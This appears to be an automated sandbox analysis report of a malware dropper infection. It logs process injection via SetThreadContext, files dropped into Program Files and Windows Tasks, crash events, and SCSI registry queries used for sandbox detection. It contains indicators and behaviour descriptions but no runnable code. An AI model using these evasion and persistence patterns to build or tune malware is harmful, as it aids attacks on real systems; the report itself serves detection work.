Fri10d184202996a0d7f.exe3012335.scr1957141.scr6vGqPAu8qfeRGLQgsAgR62zN.exeomEx3DWuyvkBKV7FT0AQ3ScE.exenwXhT4mxvbU7CM6XMjEXIBmy.exe5372622.scr7842883.scr1264582.scr7494909.scr8325071.scr3768036.scrDAD8.exe5968173.scrpid process 1120 Fri10d184202996a0d7f.exe 5840 3012335.scr 668 1957141.scr 5680 6vGqPAu8qfeRGLQgsAgR62zN.exe 6160 omEx3DWuyvkBKV7FT0AQ3ScE.exe 5284 nwXhT4mxvbU7CM6XMjEXIBmy.exe 5284 nwXhT4mxvbU7CM6XMjEXIBmy.exe 5284 nwXhT4mxvbU7CM6XMjEXIBmy.exe 5284 nwXhT4mxvbU7CM6XMjEXIBmy.exe 5284 nwXhT4mxvbU7CM6XMjEXIBmy.exe 5284 nwXhT4mxvbU7CM6XMjEXIBmy.exe 5284 nwXhT4mxvbU7CM6XMjEXIBmy.exe 5284 nwXhT4mxvbU7CM6XMjEXIBmy.exe 5284 nwXhT4mxvbU7CM6XMjEXIBmy.exe 5284 nwXhT4mxvbU7CM6XMjEXIBmy.exe 5284 nwXhT4mxvbU7CM6XMjEXIBmy.exe 5284 nwXhT4mxvbU7CM6XMjEXIBmy.exe 5284 nwXhT4mxvbU7CM6XMjEXIBmy.exe 5284 nwXhT4mxvbU7CM6XMjEXIBmy.exe 5284 nwXhT4mxvbU7CM6XMjEXIBmy.exe 6544 5372622.scr 1864 7842883.scr 6504 1264582.scr 5512 7494909.scr 8144 8325071.scr 500 3768036.scr 7096 DAD8.exe 7096 DAD8.exe 7096 DAD8.exe 7096 DAD8.exe 7096 DAD8.exe 7096 DAD8.exe 7096 DAD8.exe 7096 DAD8.exe 7096 DAD8.exe 7096 DAD8.exe 7096 DAD8.exe 7096 DAD8.exe 7096 DAD8.exe 7096 DAD8.exe 7096 DAD8.exe 7096 DAD8.exe 6548 5968173.scr -
Suspicious use of SetThreadContext 13 IoCs
Processes:
cmd.exeConhost.execmd.exeJ492h11PeW4FIMg2ZMZJh672.exenwXhT4mxvbU7CM6XMjEXIBmy.execVMGrdBG7bRqTx2km4LCCZhc.exe3A21.exeservices64.exeConhost.exeD88ljDFq9UNOTj9KFLyY3k9N.exe6180.exetmp4B76_tmp.exeDAD8.exedescription pid process target process PID 1116 set thread context of 5696 1116 cmd.exe Fri106e757f6d75.exe PID 5676 set thread context of 4264 5676 Conhost.exe 7gTvwLANAijjTXEmQlAiwSjW.exe PID 5432 set thread context of 1208 5432 cmd.exe Conhost.exe PID 6380 set thread context of 908 6380 J492h11PeW4FIMg2ZMZJh672.exe J492h11PeW4FIMg2ZMZJh672.exe PID 5284 set thread context of 4172 5284 nwXhT4mxvbU7CM6XMjEXIBmy.exe nwXhT4mxvbU7CM6XMjEXIBmy.exe PID 6168 set thread context of 5140 6168 cVMGrdBG7bRqTx2km4LCCZhc.exe cVMGrdBG7bRqTx2km4LCCZhc.exe PID 5964 set thread context of 8716 5964 3A21.exe 3A21.exe PID 1320 set thread context of 8968 1320 services64.exe explorer.exe PID 5956 set thread context of 8300 5956 Conhost.exe Qb2MIi9oegNnBVbG5gd1YnhC.exe PID 6220 set thread context of 5732 6220 D88ljDFq9UNOTj9KFLyY3k9N.exe D88ljDFq9UNOTj9KFLyY3k9N.exe PID 4176 set thread context of 8060 4176 6180.exe 6180.exe PID 8800 set thread context of 8052 8800 tmp4B76_tmp.exe tmp4B76_tmp.exe PID 7096 set thread context of 7044 7096 DAD8.exe DAD8.exe -
Drops file in Program Files directory 64 IoCs
Processes:
autosubplayer.exeautosubplayer.exesvchost.exeultramediaburner.tmpdescription ioc process File created C:\Program Files (x86)\lighteningplayer\lua\intf\modules\host.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_dummy_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_flac_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat svchost.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mlp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\keystore\libmemory_keystore_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_hevc_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpgv_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libsubtitle_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsftp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\view.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\modules\sandbox.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_stl_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libflacsys_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libgme_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png autosubplayer.exe File created C:\Program Files (x86)\temp_files autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lighteningplayer.ico autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\vocaroo.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libadummy_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libxa_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.json autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libtdummy_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\equalizer_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\twitch.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libudp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libfreetype_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\speaker-32.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_a52_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\extensions\VLSub.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\images\Other-48.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.xml autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\youtube.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\lighteningplayer\plugins\access\libhttps_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_flac_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\logger\libconsole_logger_plugin.dll autosubplayer.exe File opened for modification C:\Program Files\temp_files\data.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_cdg_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libmod_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libtdummy_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\meta\reader\filename.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libntservice_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\mobile_browse.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\view.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\libssp-0.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\index.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libsmb_plugin.dll autosubplayer.exe File opened for modification C:\Program Files\temp_files\cache.dat autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsdp_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libamem_plugin.dll autosubplayer.exe -
Drops file in Windows directory 31 IoCs
Processes:
msiexec.exesvchost.exeMsiExec.exesvchost.exerundll32.exerundll32.exedescription ioc process File opened for modification C:\Windows\Installer\MSI4CCE.tmp msiexec.exe File created C:\Windows\Installer\4aeda.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIE11A.tmp msiexec.exe File opened for modification C:\Windows\Installer\4aeda.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI1E28.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFB7C34AB823A6D84D.TMP msiexec.exe File opened for modification C:\Windows\Tasks\SA.DAT svchost.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIC271.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID195.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE978.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\SystemTemp\~DFBD8F180F79009E68.TMP msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI2435.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI44FD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID550.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID8CB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIDD8F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9D2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI13C6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1955.tmp msiexec.exe File opened for modification C:\Windows\Tasks\SA.DAT svchost.exe File opened for modification C:\Windows\Installer\MSI2434.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4F40.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFB09FC0393041AE52.TMP msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File created C:\Windows\SystemTemp\~DF81EF1263FCB534AB.TMP msiexec.exe File created C:\Windows\Tasks\cjArzio.job rundll32.exe File opened for modification C:\Windows\Tasks\cjArzio.job rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 44 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 6280 5232 WerFault.exe rundll32.exe 6684 5232 WerFault.exe rundll32.exe 7136 4540 WerFault.exe ShadowVPNInstaller_t3.exe 1888 5304 WerFault.exe Fri10acd1e0a9e6.exe 3528 4588 WerFault.exe Fri1015b9a4e0b.exe 1012 3864 WerFault.exe Fri105268dda3.exe 6528 5236 WerFault.exe FvZoTSTSOGQSyVChh8_aLSmB.exe 4468 4540 WerFault.exe ShadowVPNInstaller_t3.exe 4648 5512 WerFault.exe 8l54xatZTOGBybnf4k3ttDxI.exe 4660 5284 WerFault.exe nwXhT4mxvbU7CM6XMjEXIBmy.exe 3756 4540 WerFault.exe ShadowVPNInstaller_t3.exe 7176 3544 WerFault.exe rundll32.exe 7700 4540 WerFault.exe ShadowVPNInstaller_t3.exe 7804 5024 WerFault.exe Firstoffer.exe 6892 4672 WerFault.exe setup.exe 5368 5396 WerFault.exe kC0fqcBmzMdbc8QWWAtGpoTa.exe 7940 4540 WerFault.exe ShadowVPNInstaller_t3.exe 4316 5140 WerFault.exe CBnv8tjBVAeP34KScYqZjiqN.exe 6752 7200 WerFault.exe pz1w402Pzju6IfXoNbdcpz6B.exe 8588 4660 WerFault.exe MmYgApLfKB8gqJX8ME4xjtpT.exe 8756 6808 WerFault.exe _qv5j3tyMd2tOxtT6_2zON_w.exe 3592 3104 WerFault.exe C193.exe 3492 2552 WerFault.exe 2D3F.exe 4936 7096 WerFault.exe DAD8.exe 3228 8008 WerFault.exe 7229.exe 5656 4540 WerFault.exe ShadowVPNInstaller_t3.exe 6840 5884 WerFault.exe vc.exe 8360 6060 WerFault.exe foldershare.exe 6080 7048 WerFault.exe GcleanerEU.exe 2160 4540 WerFault.exe ShadowVPNInstaller_t3.exe 4080 4540 WerFault.exe ShadowVPNInstaller_t3.exe 3924 6172 WerFault.exe gcleaner.exe 4028 7732 WerFault.exe rundll32.exe 5648 4540 WerFault.exe ShadowVPNInstaller_t3.exe 7776 4540 WerFault.exe ShadowVPNInstaller_t3.exe 2988 4540 WerFault.exe ShadowVPNInstaller_t3.exe 5604 4540 WerFault.exe ShadowVPNInstaller_t3.exe 8452 4540 WerFault.exe ShadowVPNInstaller_t3.exe 6272 4540 WerFault.exe ShadowVPNInstaller_t3.exe 2224 1636 WerFault.exe GcleanerEU.exe 8896 3112 WerFault.exe rundll32.exe 7784 5036 WerFault.exe gcleaner.exe 480 4540 WerFault.exe ShadowVPNInstaller_t3.exe 8400 4540 WerFault.exe ShadowVPNInstaller_t3.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exeJ492h11PeW4FIMg2ZMZJh672.exe3A21.exevssvc.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0018 svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI J492h11PeW4FIMg2ZMZJh672.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3A21.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Mfg svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3A21.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI J492h11PeW4FIMg2ZMZJh672.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key value queried 